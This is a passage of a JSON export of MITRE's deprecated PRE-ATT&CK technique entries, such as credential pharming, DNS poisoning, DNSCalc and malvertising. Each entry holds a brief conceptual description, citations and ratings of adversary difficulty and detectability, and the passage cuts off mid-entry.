The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1231).\n\nStrategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1231", + "external_id": "T1231" + }, + { + "source_name": "KPMGChina5Year", + "description": "KPMG. (2016, October 19). China\u2019s 13th Five-Year Plan signals a potential new era of Sino-foreign cooperation, finds KPMG report. Retrieved March 2, 2017." + }, + { + "source_name": "China5YearPlans", + "description": "Wikipedia contributors. (2017, February 8). Five-year plans of China. Retrieved March 2, 2017." + }, + { + "source_name": "ChinaUN", + "description": "People's Republic of China. (2015, November). China's 13th Five-Year Plan. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. 
May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1008", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Credential pharming", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nCredential pharming a form of attack designed to steal users' credential by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim's computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1374", + "url": "https://attack.mitre.org/techniques/T1374" + }, + { + "description": "Ellen Messmer. (2008, January 22). First case of \"drive-by pharming\" identified in the wild. Retrieved March 2, 2017.", + "source_name": "DriveByPharming" + }, + { + "description": "Nick Johnston. (2014, March 13). Google Docs Users Targeted by Sophisticated Phishing Scam. 
Retrieved March 29, 2017.", + "source_name": "GoogleDrive Phishing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:18:16.035Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1151", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Although it can be difficult to spoof/redirect content to a hostile service via DNS poisoning or MiTM attacks, current malware such as Zeus is able to successfully pharm credentials and end users are not well-versed in checking for certificate mismatches.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Fidelity of networking monitoring must be able to detect when traffic is diverted to non-normal sources at a site level. It is possible to identify some methods of pharming, but detection capabilities are limited and not commonly implemented.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--76c9e8cb-52e1-4ddc-80d4-5f7231842e06", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DNS poisoning", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nDNS (cache) poisoning is the corruption of an Internet server's domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. 
(Citation: Google DNS Poisoning) (Citation: DNS Poisoning China) (Citation: Mexico Modem DNS Poison)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1382", + "url": "https://attack.mitre.org/techniques/T1382" + }, + { + "description": "Cindy Liu. (2016, March 30). Google DNS Poisoning Follows Brief Unblocking. Retrieved March 31, 2017.", + "source_name": "Google DNS Poisoning" + }, + { + "description": "John Leyden. (2014, January 21). DNS poisoning slams web traffic from millions in China into the wrong hole. Retrieved March 31, 2017.", + "source_name": "DNS Poisoning China" + }, + { + "description": "Paul Oliveria. (2008, January 11). Targeted Attack in Mexico: DNS Poisoning via Modems. Retrieved April 1, 2017.", + "source_name": "Mexico Modem DNS Poison" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:19:39.311Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1159", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Adversary poisons DNS entry to redirect traffic designated for one site to route to an adversary controlled resource.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Tracking multiple DNS infrastructures will likely require multiple tools/services, more advanced analytics, and mature detection/response capabilities in order to be effective. 
Few defenders demonstrate the mature processes to immediately detect and mitigate against the use of this technique.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7823039f-e2d5-4997-853c-ec983631206b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DNSCalc", + "description": "**This technique has been deprecated. Please use [DNS Calculation](https://attack.mitre.org/techniques/T1568/003).**\n\nDNS Calc is a technique in which the octets of an IP address are used to calculate the port for command and control servers from an initial DNS request. (Citation: CrowdstrikeNumberedPanda) (Citation: FireEyeDarwinsAPTGroup) (Citation: Rapid7G20Espionage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1324", + "url": "https://attack.mitre.org/techniques/T1324" + }, + { + "description": "Adam Meyers. (2013, March 29). Whois Numbered Panda. Retrieved March 6, 2017.", + "source_name": "CrowdstrikeNumberedPanda" + }, + { + "description": "Ned Moran, Mike Oppenheim. (2014, September 3). Darwin\u2019s Favorite APT Group. Retrieved March 6, 2017.", + "source_name": "FireEyeDarwinsAPTGroup" + }, + { + "source_name": "Rapid7G20Espionage", + "description": "Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. 
Retrieved March 6, 2017.", + "url": "https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:05:23.291Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true, + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1101", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "This technique assists the adversary in bypassing egress filtering designed to prevent unauthorized communication. It has been used by APT12, but not otherwise widely reported. Some botnets are hardcoded to be able to use this technique.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "There are not currently available tools that provide the ability to conduct this calculation to detect this type of activity.", + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data Hiding", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1320).\n\nCertain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. 
(Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1320", + "external_id": "T1320" + }, + { + "source_name": "BotnetsDNSC2", + "description": "Christian J. Dietrich, Christian Rossow, Felix C. Freiling, Herbert Bos, Maarten van Steen, Norbert Pohlmann. (2011). On Botnets that use DNS for Command and Control. Retrieved March 6, 2017." + }, + { + "source_name": "HAMMERTOSS2015", + "description": "FireEye. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved March 6, 2017." + }, + { + "source_name": "DNS-Tunnel", + "description": "Alexey Shulmi and Sergey Yunakovsky. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless defender is dissecting protocols or performing network signature analysis on any protocol deviations/patterns, this technique is largely undetected.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "This technique requires a more advanced protocol understanding and testing to insert covert communication into legitimate protocol fields.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1097", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deploy exploit using advertising", + "description": "**This technique has been 
deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nExploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1380", + "url": "https://attack.mitre.org/techniques/T1380" + }, + { + "description": "Michael Mimoso. (2015, March 30). AD NETWORKS RIPE FOR ABUSE VIA MALVERTISING. Retrieved March 9, 2017.", + "source_name": "TPMalvertising" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:18:44.045Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1157", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can deploy exploits via malvertising using multiple mechanisms. Such mechanisms include an image ad that is infected, redirection, or using social engineering to get the end user to install the malicious software themselves.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Although some commercial technologies are being advertised which claim to detect malvertising, it largely spreads unknowingly because it doesn't always require an action by a user.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Derive intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. 
Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1230).\n\nLeadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)", + "external_references": [ + { + "external_id": "T1230", + "url": "https://attack.mitre.org/techniques/T1230", + "source_name": "mitre-pre-attack" + }, + { + "description": "Mark M. Lowenthal. (n.d.). Ch 4: The Intelligence Process--A Macro Look; Who Does What for Whome?, Intelligence: From Secrets to Policy. Retrieved March 2, 2017.", + "source_name": "LowenthalCh4" + }, + { + "description": "Clyde R. Heffter. (2011, August 4). A Fresh Look at Collection Requirements. Retrieved March 2, 2017.", + "source_name": "Heffter" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "priority-definition-planning", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1007", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. 
Few agencies and commercial organizations may have unique insights.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1284).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1284", + "external_id": "T1284" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + }, + { + "source_name": "Schneier-cloud", + "description": "Bruce Schneier. (2017, April 5). APT10 and Cloud Hopper. Retrieved May 9, 2017." + }, + { + "source_name": "Computerworld-suppliers", + "description": "Michael Kan. (2017, April 4). Chinese hackers go after third-party IT suppliers to steal data. Retrieved May 9, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary searches publicly available sources and may find this information on the 3rd party web site listing new customers/clients.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Press releases may reveal this information particularly when it is an expected cost savings or improvement for scalability/reliability.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1061", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1260).\n\nInfrastructure services includes the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than being managed by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1260", + "external_id": "T1260" + }, + { + "source_name": "FFIECAwareness", + "description": "Federal Financial Institutions Examination Council. 
(2016, October 17). Cybersecurity Awareness. Retrieved March 5, 2017." + }, + { + "source_name": "Zetter2015Threats", + "description": "Kim Zetter. (2015, January 4). The Biggest Security Threats We\u2019ll Face in 2015. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The data is passive in nature or not controlled by the defender, so it is hard to identify when an adversary is getting or analyzing the data.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Based on what the 3rd party infrastructure is, there are many tell tail signs which indicate it is hosted by a 3rd party, such as ASN data, MX or CNAME pointers or IP addresses", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1037", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d45fe3c2-0688-43b9-ac07-7eb86f575e93", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine approach/attack vector", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1245).\n\nThe approach or attack vector outlines the specifics behind how the adversary would like to attack the target. As additional information is known through the other phases of PRE-ATT&CK, an adversary may update the approach or attack vector. 
(Citation: CyberAdversaryBehavior) (Citation: WITCHCOVEN2015) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1245", + "external_id": "T1245" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "WITCHCOVEN2015", + "description": "Jonathan Wrolstad and Barry Vengerik. (2015, November). Pinpointing Targets: Exploiting Web Analytics to Ensnare Victims. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. 
May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1022", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a7dff5d5-99f9-4a7e-ac54-a64113c28121", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine centralization of IT management", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1285).\n\nDetermining if a \"corporate\" help desk exists, the degree of access and control it has, and whether there are \"edge\" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1285", + "external_id": "T1285" + }, + { + "source_name": "SANSCentratlizeManagement", + "description": "Scott Rasmussen. (2002, January 28). Centralized Network Security Management: Combining Defense In Depth with Manageable Security. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Requires an adversary to undergo a research process to learn the internal workings of an organization. An adversary can do this by social engineering individuals in the company by claiming to need to find information for the help desk, or through social engineering of former employees or business partners.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1062", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine domain and IP address space", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1250).\n\nDomain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. 
(Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1250", + "external_id": "T1250" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public or easily obtainable information by design.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "AS and IANA data are easily available, existing research tools.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1027", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a2fc93cd-e371-4755-9305-2615b6753d91", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine external network trust dependencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1259).\n\nNetwork trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). 
(Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)", + "external_references": [ + { + "external_id": "T1259", + "url": "https://attack.mitre.org/techniques/T1259", + "source_name": "mitre-pre-attack" + }, + { + "description": "Cliff Stoll. (1089). The Cuckoo's Egg. Retrieved August 8, 2017.", + "source_name": "CuckoosEgg" + }, + { + "description": "Wikipedia contributors. (2017, January 18). The Cuckoo's Egg. Retrieved March 5, 2017.", + "source_name": "CuckoosEggWikipedia" + }, + { + "description": "WBGH Nova. (1990, October 3). The KGB, the Computer and Me. Retrieved March 5, 2017.", + "source_name": "KGBComputerMe" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "technical-information-gathering", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1036", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Determining trust relationships once internal to a network is trivial. Simple tools like trace route can show evidence of firewalls or VPNs and then hosts on the either side of the firewall indicating a different trusted network. Active Directory command line tools can also identify separate trusted networks.\n\nIf completely external to a network, sniffing traffic (if possible) could also reveal the communications protocols that could be guessed to be a trusted network connection (e.g., IPsec, maybe SSL, etc.) though this is error-prone. \n\nWith no other access, this is hard for an adversary to do completely from a remote vantage point.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This is not easily performed remotely and therefore not a detectable event. 
If the adversary can sniff traffic to deduce trust relations, this is a passive activity and not detectable.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine firmware version", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1258).\n\nFirmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1258", + "external_id": "T1258" + }, + { + "source_name": "Abdelnur Advanced Fingerprinting", + "description": "Humberto J. Abdelnur, Radu State, Olivier Festor. (2008). Advanced Network Fingerprinting. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No easy way for defenders to detect when an adversary collects this information.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Depending upon the target device, there are variable ways for an adversary to determine the firmware version. In some cases, this information can be derived from easily obtained information. 
For example, in [http://www.cisco.com Cisco] devices, the firmware version is easily determined once the device model and OS version is known since it is included in the release notes.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1035", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--dc7dfc9f-be1b-4e6e-a2e6-9a9bb2400ec9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine highest level tactical element", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1243).\n\nFrom a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1243", + "external_id": "T1243" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." 
+ }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1020", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c860af4a-376e-46d7-afbf-262c41012227", + 